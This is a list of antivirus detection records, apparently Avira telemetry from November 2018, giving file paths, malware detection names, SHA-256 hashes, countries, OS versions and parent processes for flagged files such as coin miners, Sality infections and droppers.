  Row(detection=Row(filename='usbwriteprotector.exe', filepath='K:\\HBCD\\Programs\\USBWRITEPROTECTOR.EXE', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234924-898dbbf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be6e301a\\AVSCAN-20181101-234850-846CE103\\AVSCAN-20181101-234924-898DBBF0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:49:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ppc386.exe', filepath='C:\\FPC\\2.6.0\\bin\\I386-WIN32\\ppc386.exe', filesize=2112000, name='W32/Sality.AT.#M1.#R1'), hash='cd4149e978e5eab07a52d84cba0bdb2b7f67f56a3b3c50b6f4196a8cebdd4365', metadata=Row(cmdline='\\/min', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\avgnt.exe', parentsize=919544, timestamp='2018-11-01T03:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='F:\\2017_12_30_2\\NHML-1.8.2.0-Pre2\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2757616, timestamp='2018-11-01T09:20:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-085528-7ce00020', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-085424-4733D9E0\\AVSCAN-20181101-085528-7CE00020', filesize=1344000, name='TR/Crypt.FKM.Gen.#M1.#R1'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:55:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='svсhost.exe', filepath='C:\\Program Files\\svhost\\data\\svсhost.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Package \\\\\\/Quiet  \\\\\\/progressCLSID f1851d8e-504f-48a9-acf7-...ID f1851d8e-504f-48a9-acf7-a8c7ff709abe \\\\\\/ReportId AEE5B2D7-F0E6-4861-816E-4F4D8... AEE5B2D7-F0E6-4861-816E-4F4D87C5EE01.1 \\\\\\/FlightData \\\\\\"RS:20EA\\\\\\" \\\\\\"\\\\\\/CancelId\\\\\\" \\\\\\"410eec9d-0a7f-4410-a03a-1cb2d63e62b0\\\\\\" \\\\\\"\\\\\\/DeploymentSessionID\\\\\\" \\\\...\\\\" \\\\\\"\\\\\\/ActionListFile\\\\\\" \\\\\\"C:\\\\\\\\WINDOWS\\\\\\\\SoftwareDistribution\\\\\\\\Download\\\\\\\\5a223dad84471a4651eeae50b6830072\\\\\\\\ActionList.xml\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=827576, timestamp='2018-11-01T11:24:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c344f9962f678c2280a753309bf4168df77b2d8ee7220c6b3e49eb62d4ffac05.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-12.available\\Avira\\C344F9962F678C2280A753309BF4168DF77B2D8EE7220C6B3E49EB62D4FFAC05.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c344f9962f678c2280a753309bf4168df77b2d8ee7220c6b3e49eb62d4ffac05', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:37:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='freevideodub-downloader.exe', filepath='F:\\Netbook\\LW_C\\Dokumente und Einstellungen\\Walter Schmitz\\Eigene Dateien\\FreeVideoDub-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a991124ffdc61b97ef1548bab089a7c63a32316067441dda960b67ab61acaa4a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\totalcmd_912\\TOTALCMD64.EXE', parentsize=8870024, timestamp='2018-11-01T01:24:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mooncrypter.exe', filepath='C:\\Users\\X\\Desktop\\Crypt\\Crypter-master\\[VB.Net] ForcedHacking 2.0\\MyCrypter\\MyCrypter\\obj\\Debug\\MoonCrypter.exe', filesize=256000, name='TR/Crypter.davcp.#M1.#R1'), hash='9cea3e29dd6c6eb886217a076c3a142667f24313e26e72cd57cb6fcc4415ec84', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:FJRFUf9DU0eEE4d9.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:06:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101641-ff10e2cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1bb9d718\\AVSCAN-20181101-101121-BFCCFA4D\\AVSCAN-20181101-101641-FF10E2CF', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:16:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190452-ee5e7a89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190124-CAF68D09\\AVSCAN-20181101-190452-EE5E7A89', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner_5a1aa96c.exe', filepath='E:\\Ozy\\RESTORED\\2018-04-08_14-15-30\\miner_5a1aa96c.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T20:42:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8ad4a4686235b6e2c0f0e9f4714786a98c86c74519ab76131fb7ff85f8978cde', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\8AD4A4686235B6E2C0F0E9F4714786A98C86C74519AB76131FB7FF85F8978CDE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8ad4a4686235b6e2c0f0e9f4714786a98c86c74519ab76131fb7ff85f8978cde', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a4ec00ea2524274e2bebf3906308338d', filepath='e:\\sample\\20181101_sample\\A4EC00EA2524274E2BEBF3906308338D', filesize=1792000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='ce4a1dbe7b641779cc6a930d1acefd5de844dce208175130c79943045cdad3cb', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123952-1e163523', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7dc7e76b\\AVSCAN-20181101-123910-1A3513EB\\AVSCAN-20181101-123952-1E163523', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173836-6e9dc770', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4047052b\\AVSCAN-20181101-173755-6AA4F016\\AVSCAN-20181101-173836-6E9DC770', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:38:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-062501-fb16a05d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9bb611a\\AVSCAN-20181101-055500-1F89EAA1\\AVSCAN-20181101-062501-FB16A05D', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:28:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T05:06:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='plugincontainer.exe', filepath='f:\\windows.old\\programdata\\457082ba-095e-4f86-8a98-c078f3146538\\PluginContainer.exe', filesize=780000, name='Adware/Yontoo.LU.#M1.#R1'), hash='7ed45bd9b4cd30be4ea0d49ac31d0b14b41f8ddadda95a574fc1347ade020e18', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T12:20:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:36:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vwtester.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$DRa4148.45824\\VAG_K+CAN_Commander_v2.5\\VWTester.exe', filesize=512000, name='TR/Crypt.ZPACK.Gen2.#M300.#R100871'), hash='5d15c8a10de097152559adebf4acac95b4b9b6fbc2fe0670157a1d57b05e38d9', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\VAG_K+CAN_Commander_v2.5.rar\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2277592, timestamp='2018-11-01T06:04:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b2b29', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b2b29', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:53:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-014933-b829cdda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5ba40e0c\\AVSCAN-20181102-014818-AB4A9424\\AVSCAN-20181102-014933-B829CDDA', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-082623-e9dd841c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_88909380\\AVSCAN-20181101-082157-C334B6D6\\AVSCAN-20181101-082623-E9DD841C', filesize=5888000, name='BDS/Backdoor.wxqms.#M1.#R1'), hash='306e762d1c0efe8027a4ce3d090f91fab7c68b81dd466dcba0c477bc0d019ddb', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:26:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T11:38:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sedeticot.exe', filepath='C:\\Users\\X\\AppData\\Local\\{7A7E4C22-5ED6-209A-334E-05721726F9EA}\\sedeticot.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline='-m:invagent.dll -f:RunUpdate -cv:\\\\\\/oLphG6zZU28WJ5U.5 -oobe', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T12:57:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='S:\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='S:\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:31:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T01:56:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-161811-017461a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_291c2520\\AVSCAN-20181031-161719-FAD48564\\AVSCAN-20181031-161811-017461A1', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:18:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Documents\\obd tools\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Documents\\obd tools\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:39:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hl.exe:xguard', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Counter-Strike\\hl.exe:xguard', filesize=448000, name='HEUR/APC.#M1.#R1'), hash='0dcb5d826951e384eae566b477639eae50e4e0d186e58047c6de99f512d96410', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:26:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1d02b2ecd7527ffdb2393c2abd9f9a4d35f3e33f287734c4c5057c1d39e81409', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1D02B2ECD7527FFDB2393C2ABD9F9A4D35F3E33F287734C4C5057C1D39E81409', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d02b2ecd7527ffdb2393c2abd9f9a4d35f3e33f287734c4c5057c1d39e81409', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:22:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235533-a34c6f6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24a42098\\AVSCAN-20181101-235419-9BF9C4B6\\AVSCAN-20181101-235533-A34C6F6E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:55:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:15:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.871\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.871\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:08:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='E:\\zzzzzzzzzzzzzzz\\Programs\\flashupdate.exe', filesize=1536000, name='W32/Sality.Patched.#M1.#R1'), hash='841d93e5e973c4e2a482c390704aa9f8ce9fba9c03f60af15ed8129a67a203a6', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T15:08:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='edilizia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\EDILIZIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114837-10ea26b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_051aad7c\\AVSCAN-20181101-114053-D04040A0\\AVSCAN-20181101-114837-10EA26B0', filesize=2880000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='c1f581f78fc6cf0303ded2dc948d05d44f46ff1ac0097c4435bed92d9a932172', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:48:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='9cb6f4745305a405a07e156f92d6acd31d596bdc8fbe6e60eabc86cc54206510', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='94c899075fd0f2ea9c7a7170d5e94ea2a4f506c738141d63194d144a233f60a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\94C899075FD0F2EA9C7A7170D5E94EA2A4F506C738141D63194D144A233F60A4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='94c899075fd0f2ea9c7a7170d5e94ea2a4f506c738141d63194d144a233f60a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:16:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xmrig_msvc.exe', filepath='C:\\ZIP\\Soft\\System\\Mining\\xmrrig\\xmrig_msvc.exe', filesize=448000, name='HEUR/AGEN.1004159.#M1.#R1'), hash='e27e5ced296898518d1afea14f01e1c470cd013dd13534f48e1c1e5b0fdd7ef0', metadata=Row(cmdline='--engine=2 --session-id=P1Yi2aMr0suAuIGrGBg1ubsj1xvoAwjKmSRJGOdM --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.176.200\\software_reporter_tool.exe', parentsize=13581432, timestamp='2018-11-01T06:08:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094704-1cc18f07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094704-1CC18F07', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:47:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setpmdefault.exe', filepath='C:\\xampp\\MercuryMail\\setpmdefault.exe', filesize=504000, name='W32/Jeefo.A.#M1.#R1'), hash='bad6eed724f01f67697943742ccecce77567d689318d8372e75f5f7229937cc0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:I\\\\\\/IYlszboUSLZa5D.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:49:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='customactionsm.exe', filepath='C:\\Program Files\\ScanSoft\\PaperPort\\CustomActionsM.exe', filesize=116000, name='W32/Infector.Gen.#M300.#R7863'), hash='b89d22f489f494da2364afa46a53b5ed4959a4622417d2c5b6dc9422d4c7e923', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:44:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-084653-d71c4b05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d170331b\\AVSCAN-20181101-083617-9FC09A92\\AVSCAN-20181101-084653-D71C4B05', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:46:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aapt.exe', filepath='F:\\FILES 1\\Micromax_A096\\Micromax_A096_V2_19.06.15_(by_firmwarefile.com)\\Micromax_A096_V2_19.06.15\\SN Write Tool v2.1504.00\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='e02ef0175f899e3cd4a611f159d1b17b9278db698233ddaffbc472c1d21f30f0', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:28:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dycbsj4m1vp\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540954542.5bd919ae2e13d', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Emtak\\68053478.exe', parentsize=670720, timestamp='2018-11-01T06:22:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbpsv.exe', filepath='E:\\gbpsv.exe', filesize=3968000, name='TR/Banker.D.7539712.#M1.#R1'), hash='bbfdfb74207c8cf9f0b50dd09e872b20189db4acd59cc3f191907592df5fe95b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:47:56Z'), dt=datetime.date(2018, 11, 1)),
